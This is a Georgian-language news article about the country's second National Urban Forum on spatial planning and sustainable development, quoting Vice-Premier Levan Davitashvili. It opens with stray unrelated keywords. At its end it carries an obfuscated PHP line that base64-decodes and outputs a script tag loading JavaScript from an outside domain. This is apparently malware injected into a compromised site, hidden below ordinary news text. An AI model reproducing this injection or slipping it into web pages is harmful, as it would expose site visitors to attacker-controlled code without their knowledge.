celsiusi
ავერსი შნაიდერი

 საქართველოს ეკონომიკისა და მდგრადიგანვითარების სამინისტრო, სსიპ სივრცითი და ქალაქთმშენებლობითი განვითარების სააგენტოსთან ერთად, გაეროს განსახლებისპროგრამის (UN-Habitat) მხარდაჭერით, ეროვნულ ურბანულ ფორუმს მართავს. ფორუმი ორი დღის განმავლობაში გაგრძელდება.

20-21 ივნისს ჩატარდება პანელური სესიები, სადაც ექსპერტები ეროვნული სივრცითი მოწყობის კონცეფციის შემუშავებისა და მათში მდგრადი განვითარების მიზნების ინტეგრირების გზებს განიხილავენ.

ფორუმის სამუშაო ფორმატში ჩაერთვებიან სივრცითი გადაწყვეტილებების მიღებასა და აღსრულებაზე პასუხისმგებელი პირები; ღონისძიებას ესწრებიან ცენტრალური და რეგიონული ხელისუფლების წარმომადგენლები, ადგილობრივი და საერთაშორისო ექსპერტები, აკადემიური, პროფესიული წრეები და სტუდენტები.

საქართველოს ეროვნული ურბანული ფორუმი ხელს შეუწყობს მდგრადი განვითარების მიზნების მიღწევის უკეთესი საშუალებების განსაზღვრას, სივრცითი და ურბანული დოკუმენტაციის შემუშავებაში ჩართულ პირებს შორის თანამშრომლობის გაძლიერებას, ქვეყნის კლიმატის ზემოქმედებისა და ბუნებრივი გარემოს გამოწვევების გადახედვას და სივრცითი დაგეგმარების შესახებ საზოგადოების ცნობიერების ამაღლებას.

ღონისძიება ქვეყნის პირველილმა ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარებისმინისტრმა ლევან დავითაშვილმა გახსნა. სიტყვით გამოვიდა ასევე გაერო-ს განსახლების პროგრამის რეგიონული მრჩეველი კატია შაფერი.

„ეროვნული სივრცითი ფორუმი უკვე მეორედ იმართება საქართველოში. ამ ფორმატში ჩვენ, ადგილობრივ და საერთაშორისო ექსპერტებთან ერთად ვიხილავთ ქვეყნის განვითარების მნიშვნელოვან მიმართულებებს და სივრცითი დაგეგმვის მნიშვნელოვან პრიორიტეტებს. იცით, რომ ჩვენ ვმუშაობთ ერთიან ეროვნულ სივრცით გეგმაზე, რომელშიც ასახული იქნება გაერო-ს მდგრადი განვითარების მიზნები და ჩვენი პრიორიტეტები, მათ შორის 2030 წლის ჩვენი განვითარების გეგმა და ძალიან მნიშვნელოვანია, რომ სივრცითი დაგეგმვა იყოს ადეკვატური განვითარების იმ პრიორიტეტების, რომლებიც ქვეყანას გააჩნია, იმისთვის, რომ ოპტიმალურად გამოვიყენოთ ტერიტორიული განვითარება ჩვენი ქვეყნის, მათ შორის დავძლიოთ გამოწვევები მაქსიმალურად და შევქმნათ ისეთი გარემო, რომელიც იქნება ყველანაირად კომფორტული ადამიანისთვის, ასევე ეკონომიკური განვითარებისთვის იქნება პერსპექტიული. განსაკუთრებით ამ ეტაპზე, როდესაც ქვეყანა სწრაფი ეკონომიკური ზრდით ხასიათდება, მნიშვნელოვანია, რომ სივრცითი დაგეგმვა ადეკვატურად სწრაფად მიჰყვებოდეს იმისთვის, რომ ჩვენ ავიცილოთ თავიდან ქაოტური განაშენიანება და მივიღოთ მდგრადი სივრცითი განვითარება, იმგვარი, რომელიც ქვეყნის კონკირენტუნარიანობას გაზრდის“, – განაცხადა ლევან დავითაშვილმა.

264
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");